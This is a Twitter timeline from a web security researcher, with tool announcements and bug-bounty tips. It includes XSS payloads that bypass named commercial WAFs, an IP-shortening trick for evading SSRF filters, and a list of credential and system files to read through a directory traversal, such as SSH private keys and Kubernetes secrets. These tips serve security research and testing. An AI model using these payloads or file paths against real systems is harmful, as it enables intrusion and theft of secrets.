Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @0xInfection
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @0xInfection
-
Prikvačeni tweet
I learnt today that IP addresses can be shortened by dropping the zeroes. Examples: http://1.0.0.1 → http://1.1 http://192.168.0.1 → http://192.168.1 This bypasses WAF filters for SSRF, open-redirect, etc where any IP as input gets blacklisted.
#infosec#bugbounty#bugbountytippic.twitter.com/2zcrLCmq0R
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
WAFW00F v2.1 is just out! Got a json/csv/txt file having a list of sites which needs to be tested for WAFs? Want a decent output in json/csv? We got you covered! wafw00f -i file.{json|csv|txt} -o file.{txt|csv|json} http://github.com/EnableSecurity/wafw00f …
#infosec#bugbounty#bugbountytipshttps://twitter.com/sandrogauci/status/1222497875747315715 …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
[WAF Bypass Tip] Often WAF devs. include some sort of shared secret as a whitelist string. If the WAF has some kind of open-source version, try going through the source looking for it. Once found, you have the killswitch in your hand.
#infosec#bugbounty#bugbountytipspic.twitter.com/pDPQxcWEII
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Infected Drake proslijedio/la je Tweet
WAFW00F : Allows one to identify and fingerprint Web Application Firewall (WAF) products protecting a website : https://github.com/EnableSecurity/wafw00f … cc
@sandrogauci ||@0xInfectionHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Infected Drake proslijedio/la je Tweet
WAF bypass payload against Firefox by
@0xInfection <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` {}'>Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Wooo! Tested this amongst a couple of other WAFs and it bypasses Dotdefender, Comodo and a couple of other WAFs too. Payload seems quite lethal! :) NOTE: Payload seems to be Firefox only. :/
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Observed a weird WAF bypass case: > WAF blocked <img> tag > 'src' attr got blocked too > Found WAF didn't block <image> Finally crafted: <image src\r\n=valid.jpg onloadend='new class extends (co\u006efir\u006d)/**/`` {}'> > BOOM
#infosec#bugbounty#bugbountytipspic.twitter.com/4EkiATn79Q
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Verifying myself: I am 0xinfection on http://Keybase.io . nKL89qKXoVEXp6-Ahycj_zizwIqQLdQ4Sqy- / https://keybase.io/0xinfection/sigs/nKL89qKXoVEXp6-Ahycj_zizwIqQLdQ4Sqy- …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Why not step into the next decade with WAF bypasses? Here are some gifts.
- Imperva
<a69/onclick=write()>pew
- DotDefender
<a69/onclick=[0].map(alert)>pew
- Cloudbric
<a69/onclick=[1].findIndex(alert)>pew
Happy 0x32303230.
#infosec#bugbounty#bugbountytipspic.twitter.com/74KGzwMqME
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
If you wish to try it out, get it here: http://github.com/enablesecurity/wafw00f … Feedbacks appreciated! :)
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
With more than 300 commits and hard work for the past few months, I am happy to finally announce that WAFW00F v2.0 (Emporium) release is out. WAFW00F can now accurately fingerprint 150+ WAFs out there (largest fingerprint database till now).
#infosec#bugbounty#bugbountytipspic.twitter.com/3AKdxvGkg6
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Infected Drake proslijedio/la je Tweet
So as promised, I am open-sourcing my own collection on WAFs as an awesome list. I still feel the collection is pretty incomplete. There is a lot *eyes closed* left to add to it. https://github.com/0xInfection/Awesome-WAF …
#sharingiscaringpic.twitter.com/QAyzjptu2h
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Hey folks, v2.1.1 of XSRFProbe is out! \o/ So whether you're stuck at an endpoint with forms in it or looking to learn about how cross site request forgeries (CSRF) work, give this toolkit a try.
http://github.com/0xInfection/XSRFProbe …
#infosec#appsec#bugbounty#bugbountytippic.twitter.com/5NMCR7YRMq
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Infected Drake proslijedio/la je Tweet
Imperva WAF bypass by
@0xInfection <bleh/onclick=top[/al/.source+/ert/.source]	``>clickHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Messed with the
#Imperva WAF a few days ago and crafted some bypasses. Here is an XSS payload which bypasses the Imperva WAF. <bleh/onclick=top[/al/.source+/ert/.source]	``>click P.S. - Didn't expect Imperva to pop so easily. :p#infosec#XSS#bugbounty#bugbountytipspic.twitter.com/xO2LqvP8by
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
I wrote up a small script to return a single instance of a URL from a (huge) list of URLs irrespective of their parameter values. Useful in cases where you need to sort out URLs obtained from the wayback machine. Thanks to
@har1sec for the assignment. :)#infosec#bugbountytiphttps://twitter.com/0xInfection/status/1184061254073122816 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Need a server which restarts itself after every single request? Set it up using netcat via this one-liner!
while :; do (echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(wc -c <index.html)\r\n\r\n"; cat index.html) | nc -l -p 8080; done
#infosec#bugbounty#bugbountytipspic.twitter.com/K9GGsHDR7k
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Other interesting files you should have a look: /proc/mounts /proc/net/arp /etc/motd /etc/mysql/my.cnf /proc/net/route /proc/sched_debug /proc/self/environ /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /var/run/secrets/kubernetes.io/serviceaccount /proc/self/cwd/index.phppic.twitter.com/jn1EsUqHL3
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Got a directory traversal? Don't forget to check out /proc/[0-9]*/fd/[0-9]* for more juicy info!
#infosec#bugbounty#bugbountytipspic.twitter.com/kS14RvNbZd
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
And a big thanks to
@sandrogauci for reviewing the article. :)Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
After weeks of research and experimentation with timing based side channel attacks on WAFs, I'm finally glad to present an article detailing my experiments. I hope you enjoy reading it as much as I enjoyed writing it up. Feedbacks appreciated.
#infosec https://link.medium.com/miVag8L8fZ pic.twitter.com/7gfJcdlePx
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.
